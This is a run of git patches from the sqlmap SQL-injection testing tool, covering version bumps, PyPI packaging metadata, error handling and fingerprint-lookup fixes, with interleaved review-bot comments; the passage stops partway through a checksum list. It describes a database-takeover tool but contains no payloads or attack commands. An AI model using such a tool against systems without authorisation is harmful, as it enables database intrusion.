commands on the operating system via out-of-band connections. From bc13d8923b5d2758dc3335d8d2b1212c6142dd27 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 20 Aug 2018 19:43:09 +0200 Subject: [PATCH 233/428] Adding long_description to PyPI upload script --- extra/shutils/pypi.sh | 3 ++- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 4 insertions(+), 3 deletions(-) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index dc82acbeb55..c8712b558fa 100755 --- a/extra/shutils/pypi.sh 
+++ b/extra/shutils/pypi.sh @@ -25,7 +25,8 @@ from setuptools import setup, find_packages setup( name='sqlmap', version='$VERSION', - description="Automatic SQL injection and database takeover tool", + description='Automatic SQL injection and database takeover tool', + long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.', author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', url='https://sqlmap.org', diff --git a/lib/core/settings.py b/lib/core/settings.py index 2c700e8e72f..d2e606b55a9 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.10" +VERSION = "1.2.8.11" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 9ca0b4f3300..7ad7e5e2053 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
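Review bot: `long_description` duplicates the README's opening paragraph as a literal inside the generated `setup.py`, so the two texts will drift apart the next time the README is edited (a neighbouring commit in this series edits it). If the README is available where the script runs, reading it is shorter and self-maintaining: `long_description=open('README.md').read(),` plus `long_description_content_type='text/markdown',` where the setuptools in use supports that key; whether the working directory holds README.md at that point is outside the hunk. The quoting change on `description` is cosmetic.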
@@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -4a7ac205b72dafaf6c89cc4a0a8459f4 lib/core/settings.py +fd4bb6f2f20b269d171bc215cc24a493 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py From 2542b6d2414cdc35a5ce53e774d00956bd815b57 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 20 Aug 2018 19:44:25 +0200 Subject: [PATCH 234/428] Minor patch (https version of site is not available) --- extra/shutils/pypi.sh | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/extra/shutils/pypi.sh b/extra/shutils/pypi.sh index c8712b558fa..aa1ad0aab53 100755 --- a/extra/shutils/pypi.sh +++ b/extra/shutils/pypi.sh @@ -29,7 +29,7 @@ setup( long_description='sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.', author='Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar', author_email='bernardo@sqlmap.org, miroslav@sqlmap.org', - url='https://sqlmap.org', + url='http://sqlmap.org', download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip', license='GNU General Public License v2 (GPLv2)', packages=find_packages(), diff --git a/lib/core/settings.py b/lib/core/settings.py index d2e606b55a9..1338d675dd3 100644 --- a/lib/core/settings.py 
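Review bot: Switching `url` to `http://sqlmap.org` is explained only in the commit title; package metadata is long-lived and a later maintainer will not know whether the plain-HTTP homepage is deliberate, so leave a marker next to it: `url='http://sqlmap.org',  # TODO: switch back to https once the site serves it`. `download_url` still points at the HTTPS GitHub archive, which is the link that actually delivers code, so the downgrade affects only the displayed homepage.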
+++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.11" +VERSION = "1.2.8.12" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 7ad7e5e2053..27c47cf979a 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -fd4bb6f2f20b269d171bc215cc24a493 lib/core/settings.py +aaeca967ebd83967b78a9a56fb029696 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py From 36e62fe8a7e9c3754f1fd6c52e2bfe013a983c3f Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 22 Aug 2018 10:20:26 +0200 Subject: [PATCH 235/428] Minor update --- lib/core/settings.py | 2 +- lib/request/pkihandler.py | 11 +++++++++-- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1338d675dd3..ace8cdacb2e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.12" +VERSION = "1.2.8.13" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) 
diff --git a/lib/request/pkihandler.py b/lib/request/pkihandler.py index 369cf7d4d74..71a5eb352ac 100644 --- a/lib/request/pkihandler.py +++ b/lib/request/pkihandler.py @@ -9,6 +9,8 @@ import urllib2 from lib.core.data import conf +from lib.core.common import getSafeExString +from lib.core.exception import SqlmapConnectionException class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): def __init__(self, auth_file): @@ -19,5 +21,10 @@ def https_open(self, req): return self.do_open(self.getConnection, req) def getConnection(self, host, timeout=None): - # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain - return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) + try: + # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain + return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) + except IOError, ex: + errMsg = "error occurred while using key " + errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex)) + raise SqlmapConnectionException(errMsg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 27c47cf979a..18b703e9a3c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -aaeca967ebd83967b78a9a56fb029696 lib/core/settings.py +0cb27d1543a4cd5a1f466846965a2bf3 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 
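Review bot: The new `try`/`except IOError` wraps only the `httplib.HTTPSConnection(...)` constructor, and on Python 2 that constructor merely stores `cert_file`/`key_file`; the files are read when the socket is wrapped during `connect()`, so an unreadable or malformed key file will most likely still surface later as an unhandled error rather than as the new `SqlmapConnectionException` (worth verifying against the httplib version in use). The `timeout` parameter of `getConnection` is accepted but ignored in favour of `conf.timeout`; either honour it (`timeout=timeout if timeout is not None else conf.timeout`) or add a comment stating that `conf.timeout` deliberately wins. The new import lines also place `lib.core.common` after `lib.core.data`, breaking the alphabetical order the other modules in this series appear to keep.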
@@ -77,7 +77,7 @@ dd4598675027fae99f2e2475b05986da lib/request/direct.py 1e5532ede194ac9c083891c2f02bca93 lib/request/__init__.py a5cbc19ee18bd4b848515eb3ea3291f0 lib/request/inject.py aaf956c1e9855836c3f372e29d481393 lib/request/methodrequest.py -51eeaa8abf5ba62aaaade66d46ff8b00 lib/request/pkihandler.py +83c7a13e38ad5eedb6bb13463a7a9e90 lib/request/pkihandler.py 2c3774b72586985719035b195f144d7b lib/request/rangehandler.py 3cd9d17fc52bb62db29e0e24fc4d8a97 lib/request/redirecthandler.py 7f12d8f3b6665ed7053954bba70ff718 lib/request/templates.py From f20e7b403ae167fcc9aeb2d91cede76d96d60409 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 22 Aug 2018 10:41:43 +0200 Subject: [PATCH 236/428] Fixes #3211 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- plugins/dbms/mysql/connector.py | 2 +- txt/checksum.md5 | 6 +++--- 4 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index c1271be4c52..99cce710312 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1347,7 +1347,7 @@ def parseTargetDirect(): conf.hostname = "localhost" conf.port = 0 - conf.dbmsDb = details.group("db") + conf.dbmsDb = details.group("db").strip() if details.group("db") is not None else None conf.parameters[None] = "direct connection" break diff --git a/lib/core/settings.py b/lib/core/settings.py index ace8cdacb2e..318406673f0 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.13" +VERSION = "1.2.8.14" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/mysql/connector.py b/plugins/dbms/mysql/connector.py index 7f2be46ef11..7521b2bc2b7 100644 
--- a/plugins/dbms/mysql/connector.py +++ b/plugins/dbms/mysql/connector.py @@ -37,7 +37,7 @@ def connect(self): try: self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True) - except (pymysql.OperationalError, pymysql.InternalError), msg: + except (pymysql.OperationalError, pymysql.InternalError, pymysql.ProgrammingError), msg: raise SqlmapConnectionException(msg[1]) except struct.error, msg: raise SqlmapConnectionException(msg) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 18b703e9a3c..4db5c35a75f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -28,7 +28,7 @@ c7443613a0a2505b1faec931cee2a6ef lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py 0adf547455a76dc71e6a599e52da1ed9 lib/core/agent.py fd8f239e259afaf5f24bcf34a0ad187f lib/core/bigarray.py -655326aed648209c5477464825cebea8 lib/core/common.py +3652331fec15a31ace15d8cce4024495 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -0cb27d1543a4cd5a1f466846965a2bf3 lib/core/settings.py +f1c4b44edd5b5dcd2a03c71d4d8d3ef8 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 
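Review bot: Adding `pymysql.ProgrammingError` to the tuple keeps the `msg[1]` indexing, which assumes every caught exception carries a (code, message) pair; pymysql does raise ProgrammingError in that shape from its server-error path, but elsewhere it is raised with a single string argument, and then `msg[1]` fails with IndexError inside the handler and hides the original error. Something like `raise SqlmapConnectionException(msg[1] if len(msg.args) > 1 else msg)` keeps the existing behaviour for two-argument errors and degrades cleanly otherwise. The body of `connect` starts before the hunk.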
@@ -168,7 +168,7 @@ f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py 612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py 3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py +11a5724fdc0b0c0eb2626d952cda216a plugins/dbms/mysql/connector.py 445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py 4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py 4e23494d0a8f41c22ec3861fb404e9f7 plugins/dbms/mysql/fingerprint.py From 2dfc3837009152052dd727dc97ef40eccc530d5d Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Wed, 22 Aug 2018 17:58:00 +0200 Subject: [PATCH 237/428] Fixes #3215 --- lib/core/settings.py | 2 +- plugins/generic/databases.py | 2 ++ txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 318406673f0..2ee193f5e08 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.14" +VERSION = "1.2.8.15" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 6e9ec1e638e..c399ed13744 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py 
@@ -601,6 +601,8 @@ def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMod if values is None: values = inject.getValue(query, blind=False, time=False) + if values and isinstance(values[0], basestring): + values = [values] if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 4db5c35a75f..3de69dd1d81 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -f1c4b44edd5b5dcd2a03c71d4d8d3ef8 lib/core/settings.py +3dfc00af3de897fbe62c6b2d5a397c13 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py @@ -205,7 +205,7 @@ a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py 79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py 34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py ce6a6ff713852b5eca7b78316cc941c4 plugins/generic/custom.py -156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py +78813e60e7108f78ef1af46d360f41bf plugins/generic/databases.py 4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py 0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py From d6cf038e48846681b8b533c22cc25885069ee343 Mon Sep 17 00:00:00 2001 
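Review bot: The new normalisation `if values and isinstance(values[0], basestring): values = [values]` also fires when `values` is itself a plain string (if getValue can return one), because `values[0]` is then a one-character string; the result is a one-element list holding the string, which the row handling below presumably does not expect. If the intent is to wrap a single flat row into a list of rows, checking the container first is tighter: `if values and isinstance(values, (list, tuple)) and isinstance(values[0], basestring):`. A short comment such as `# single-row results arrive as a flat tuple; wrap into a list of rows` would also explain why a type check is doing shape repair here. getColumns starts and ends outside the hunk.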
From: Miroslav Stampar Date: Sat, 25 Aug 2018 22:57:49 +0200 Subject: [PATCH 238/428] Fixes #3216 --- lib/core/settings.py | 2 +- plugins/dbms/access/fingerprint.py | 2 +- plugins/dbms/db2/fingerprint.py | 2 +- plugins/dbms/firebird/fingerprint.py | 2 +- plugins/dbms/hsqldb/fingerprint.py | 2 +- plugins/dbms/informix/fingerprint.py | 2 +- plugins/dbms/mssqlserver/fingerprint.py | 6 +++--- plugins/dbms/mysql/fingerprint.py | 2 +- plugins/dbms/oracle/fingerprint.py | 2 +- plugins/dbms/postgresql/fingerprint.py | 2 +- plugins/dbms/sqlite/fingerprint.py | 2 +- plugins/dbms/sybase/fingerprint.py | 2 +- txt/checksum.md5 | 24 ++++++++++++------------ 13 files changed, 26 insertions(+), 26 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2ee193f5e08..7e7ff864554 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.8.15" +VERSION = "1.2.8.16" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/dbms/access/fingerprint.py b/plugins/dbms/access/fingerprint.py index 5c6896dc598..ca44557bef1 100644 --- a/plugins/dbms/access/fingerprint.py +++ b/plugins/dbms/access/fingerprint.py @@ -129,7 +129,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") if re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/db2/fingerprint.py b/plugins/dbms/db2/fingerprint.py index 6a584b8a9c3..364e89d31af 100644 --- a/plugins/dbms/db2/fingerprint.py +++ b/plugins/dbms/db2/fingerprint.py 
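Review bot: Switching to `kb.bannerFp.get("dbmsVersion")` turns the former KeyError into `banVer = None`, but the next statement in this hunk, `banVer += ", logging enabled"`, then raises TypeError whenever the banner matches `-log$` and no version was parsed. The same pattern reappears in the firebird and hsqldb hunks of this commit; the mysql hunk already guards it with `if banVer and re.search(r"-log$", kb.data.banner):`, and the other three should do the same. getFingerprint starts and ends outside the hunk.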
@@ -68,7 +68,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/firebird/fingerprint.py b/plugins/dbms/firebird/fingerprint.py index f63a57f49ce..a8f5d7fc92c 100644 --- a/plugins/dbms/firebird/fingerprint.py +++ b/plugins/dbms/firebird/fingerprint.py @@ -50,7 +50,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") if re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py index f6a9aa65992..fcad249f917 100644 --- a/plugins/dbms/hsqldb/fingerprint.py +++ b/plugins/dbms/hsqldb/fingerprint.py @@ -47,7 +47,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") if re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/informix/fingerprint.py b/plugins/dbms/informix/fingerprint.py index 8c7e15252b4..e6ca564821c 100644 --- a/plugins/dbms/informix/fingerprint.py +++ b/plugins/dbms/informix/fingerprint.py @@ -44,7 +44,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/mssqlserver/fingerprint.py b/plugins/dbms/mssqlserver/fingerprint.py index f5a5af27ea8..5fbf73680af 100644 
--- a/plugins/dbms/mssqlserver/fingerprint.py +++ b/plugins/dbms/mssqlserver/fingerprint.py @@ -46,9 +46,9 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - release = kb.bannerFp["dbmsRelease"] if 'dbmsRelease' in kb.bannerFp else None - version = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - servicepack = kb.bannerFp["dbmsServicePack"] if 'dbmsServicePack' in kb.bannerFp else None + release = kb.bannerFp.get("dbmsRelease") + version = kb.bannerFp.get("dbmsVersion") + servicepack = kb.bannerFp.get("dbmsServicePack") if release and version and servicepack: banVer = "%s %s " % (DBMS.MSSQL, release) diff --git a/plugins/dbms/mysql/fingerprint.py b/plugins/dbms/mysql/fingerprint.py index ac9eabd967b..89ea5c8ee09 100644 --- a/plugins/dbms/mysql/fingerprint.py +++ b/plugins/dbms/mysql/fingerprint.py @@ -124,7 +124,7 @@ def getFingerprint(self): value += "\n%scomment injection fingerprint: %s" % (blank, comVer) if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if "dbmsVersion" in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") if banVer and re.search(r"-log$", kb.data.banner): banVer += ", logging enabled" diff --git a/plugins/dbms/oracle/fingerprint.py b/plugins/dbms/oracle/fingerprint.py index 22a8a6968e5..692d26fb1d9 100644 --- a/plugins/dbms/oracle/fingerprint.py +++ b/plugins/dbms/oracle/fingerprint.py @@ -46,7 +46,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/postgresql/fingerprint.py b/plugins/dbms/postgresql/fingerprint.py index 0e577de4e4a..5860b820906 100644 --- a/plugins/dbms/postgresql/fingerprint.py +++ b/plugins/dbms/postgresql/fingerprint.py 
@@ -45,7 +45,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py index 109c7d6b399..abaeeb2cb64 100644 --- a/plugins/dbms/sqlite/fingerprint.py +++ b/plugins/dbms/sqlite/fingerprint.py @@ -45,7 +45,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py index a8d707d0fac..5fda220b8ba 100644 --- a/plugins/dbms/sybase/fingerprint.py +++ b/plugins/dbms/sybase/fingerprint.py @@ -46,7 +46,7 @@ def getFingerprint(self): value += "active fingerprint: %s" % actVer if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] + banVer = kb.bannerFp.get("dbmsVersion") banVer = Format.getDbms([banVer]) value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3de69dd1d81..b45f67f62e5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -48,7 +48,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3dfc00af3de897fbe62c6b2d5a397c13 lib/core/settings.py +b5b936aa2f5ea4aa28d66e924ef1dba9 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 5b7ff6f49ff3af62f8c12f74b6d49dd2 lib/core/target.py 
@@ -121,35 +121,35 @@ e9e73cd6bd814dd7823a9da913cea61c lib/utils/xrange.py b9d2761f47fec3d98b88311a263fd5db plugins/dbms/access/connector.py 3f1c50a1507d1c2f69c20c706230e2e2 plugins/dbms/access/enumeration.py fcc66fc377db3681f7890ec55675564b plugins/dbms/access/filesystem.py -c2428c5c73d049abf4442ec1b9404a25 plugins/dbms/access/fingerprint.py +cdd082981b421248ece0e7cf278071ff plugins/dbms/access/fingerprint.py e657b1b7a295a38ac9ce515158164f00 plugins/dbms/access/__init__.py 77686d7c7e287d5db0a9a87f2c7d4902 plugins/dbms/access/syntax.py 2f1d8706b51497623b2b59c07b552bdc plugins/dbms/access/takeover.py 8df07c2805aceb7d6fb4add40de84795 plugins/dbms/db2/connector.py 4deeda463003ab71e7d2f34a263b5bbf plugins/dbms/db2/enumeration.py da9dccd1f9ec2cf1e53295125dd983a0 plugins/dbms/db2/filesystem.py -b54dbf44590a5cbefb2b4f8e9a01a383 plugins/dbms/db2/fingerprint.py +ce434fc05a7ad236c49a155d62f0cac4 plugins/dbms/db2/fingerprint.py 95b35cbd859bbced44e7f8fd84486d75 plugins/dbms/db2/__init__.py 82d96d8fcfd565129580260040555623 plugins/dbms/db2/syntax.py 25f0fb28e9defcab48a2e946fbb7550a plugins/dbms/db2/takeover.py 53bd7de27d37958f543f5329362ac298 plugins/dbms/firebird/connector.py bc4d71116d7296d63894484f2e60ade2 plugins/dbms/firebird/enumeration.py c3ca81000200e5ab4210e9bf2e04ce93 plugins/dbms/firebird/filesystem.py -bd2159afbe83c70059f57712b4ae0189 plugins/dbms/firebird/fingerprint.py +bf98dbd666c162088f23ee697c065010 plugins/dbms/firebird/fingerprint.py d4ea3036492b8ae15340548b2936021f plugins/dbms/firebird/__init__.py c56f2dabe88fd761a1a9a51e4d104088 plugins/dbms/firebird/syntax.py 1522a29bd4b54ea78bb2855fc32b6c72 plugins/dbms/firebird/takeover.py 271a7f16e781d56a0a31a3d5515a1945 plugins/dbms/hsqldb/connector.py 95919592e5bb83df00b99bb9e8a70977 plugins/dbms/hsqldb/enumeration.py 616595e74ecb644271cbbd31815d92e0 plugins/dbms/hsqldb/filesystem.py -b7d693a6f5f39fee0a65f2d7b0830c5e plugins/dbms/hsqldb/fingerprint.py +aabc2b877a3696b99912bdf362c0fb69 
